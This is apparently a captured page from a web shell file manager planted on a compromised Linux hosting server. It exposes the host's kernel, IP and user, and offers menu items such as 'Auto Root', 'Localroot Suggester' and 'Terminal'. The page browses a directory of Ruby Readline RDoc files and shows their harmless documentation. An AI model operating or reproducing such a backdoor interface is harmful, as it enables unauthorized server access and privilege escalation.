Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Readline /
Delete
Unzip
Name
Size
Permission
Date
Action
basic_quote_characters%3d-c.ri
518
B
-rw-r--r--
2023-07-26 17:26
basic_quote_characters-c.ri
515
B
-rw-r--r--
2023-07-26 17:26
basic_word_break_characters%3d-c.ri
674
B
-rw-r--r--
2023-07-26 17:26
basic_word_break_characters-c.ri
569
B
-rw-r--r--
2023-07-26 17:26
cdesc-Readline.ri
3.05
KB
-rw-r--r--
2023-07-26 17:26
completer_quote_characters%3d-c.ri
751
B
-rw-r--r--
2023-07-26 17:26
completer_quote_characters-c.ri
549
B
-rw-r--r--
2023-07-26 17:26
completer_word_break_characters%3d-c.ri
657
B
-rw-r--r--
2023-07-26 17:26
completer_word_break_characters-c.ri
582
B
-rw-r--r--
2023-07-26 17:26
completion_append_character%3d-c.ri
1.27
KB
-rw-r--r--
2023-07-26 17:26
completion_append_character-c.ri
572
B
-rw-r--r--
2023-07-26 17:26
completion_case_fold%3d-c.ri
407
B
-rw-r--r--
2023-07-26 17:26
completion_case_fold-c.ri
716
B
-rw-r--r--
2023-07-26 17:26
completion_proc%3d-c.ri
2.65
KB
-rw-r--r--
2023-07-26 17:26
completion_proc-c.ri
375
B
-rw-r--r--
2023-07-26 17:26
emacs_editing_mode%3f-c.ri
502
B
-rw-r--r--
2023-07-26 17:26
emacs_editing_mode-c.ri
566
B
-rw-r--r--
2023-07-26 17:26
filename_quote_characters%3d-c.ri
611
B
-rw-r--r--
2023-07-26 17:26
filename_quote_characters-c.ri
588
B
-rw-r--r--
2023-07-26 17:26
get_screen_size-c.ri
546
B
-rw-r--r--
2023-07-26 17:26
input%3d-c.ri
402
B
-rw-r--r--
2023-07-26 17:26
line_buffer-c.ri
518
B
-rw-r--r--
2023-07-26 17:26
output%3d-c.ri
408
B
-rw-r--r--
2023-07-26 17:26
point-c.ri
627
B
-rw-r--r--
2023-07-26 17:26
readline-c.ri
2.79
KB
-rw-r--r--
2023-07-26 17:26
refresh_line-c.ri
359
B
-rw-r--r--
2023-07-26 17:26
set_screen_size-c.ri
558
B
-rw-r--r--
2023-07-26 17:26
vi_editing_mode%3f-c.ri
490
B
-rw-r--r--
2023-07-26 17:26
vi_editing_mode-c.ri
525
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::NormalModule[iI" Readline:ET@0o:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[ I"=The Readline module provides interface for GNU Readline.;TI"EThis module defines a number of methods to facilitate completion;TI":and accesses input history from the Ruby interpreter.;TI"2This module supported Edit Line(libedit) too.;TI"-libedit is compatible with GNU Readline.;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@labelI"GNU Readline;T;[o; ;[I"/http://www.gnu.org/directory/readline.html;To;;I"libedit;T;[o; ;[I"%http://www.thrysoee.dk/editline/;T@o; ;[I"HReads one inputted line with line edit by Readline.readline method.;TI"<At this time, the facilitatation completion and the key;TI"7bind like Emacs can be operated like GNU Readline.;T@o:RDoc::Markup::Verbatim;[ I"require "readline" ;FI"/while buf = Readline.readline("> ", true) ;FI" p buf ;FI" end ;Fo; ;[I"DThe content that the user input can be recorded to the history.;TI"?The history can be accessed by Readline::HISTORY constant.;T@o;;[ I"require "readline" ;FI"/while buf = Readline.readline("> ", true) ;FI" p Readline::HISTORY.to_a ;FI" print("-> ", buf, "\n") ;FI" end ;Fo; ;[I"AMost of methods raise SecurityError exception if $SAFE is 4.;T@o; ;[I"9Documented by TAKAO Kouji <kouji at takao7 dot net>.;T: @fileI"ext/readline/readline.c;T;0[ [ [I"HISTORY;To;;[o; ;[ I"DThe history buffer. It extends Enumerable module, so it behaves;TI"just like an array.;TI"?For example, gets the fifth content that the user input by;TI"HISTORY[4].;T;0@>[I"FILENAME_COMPLETION_PROC;To;;[o; ;[I"GThe Object with the call method that is a completion for filename.;TI"6This is sets by Readline.completion_proc= method.;T;0@>[I"USERNAME_COMPLETION_PROC;To;;[o; ;[I"HThe Object with the call method that is a completion for usernames.;TI"6This is sets by Readline.completion_proc= method.;T;0@>[I"VERSION;To;;[o; ;[I"2Version string of GNU Readline or libedit. ;T;0@>[ [[I" class;F[[:public[![I"basic_quote_characters;T@>[I"basic_quote_characters=;T@>[I" basic_word_break_characters;T@>[I"!basic_word_break_characters=;T@>[I"completer_quote_characters;T@>[I" completer_quote_characters=;T@>[I"$completer_word_break_characters;T@>[I"%completer_word_break_characters=;T@>[I" completion_append_character;T@>[I"!completion_append_character=;T@>[I"completion_case_fold;T@>[I"completion_case_fold=;T@>[I"completion_proc;T@>[I"completion_proc=;T@>[I"emacs_editing_mode;T@>[I"emacs_editing_mode?;T@>[I"filename_quote_characters;T@>[I"filename_quote_characters=;T@>[I"get_screen_size;T@>[I"input=;T@>[I"line_buffer;T@>[I"output=;T@>[I" point;T@>[I" readline;T@>[I"refresh_line;T@>[I"set_screen_size;T@>[I"vi_editing_mode;T@>[I"vi_editing_mode?;T@>[:protected[ [:private[ [I" instance;F[[;[ [;[ [;[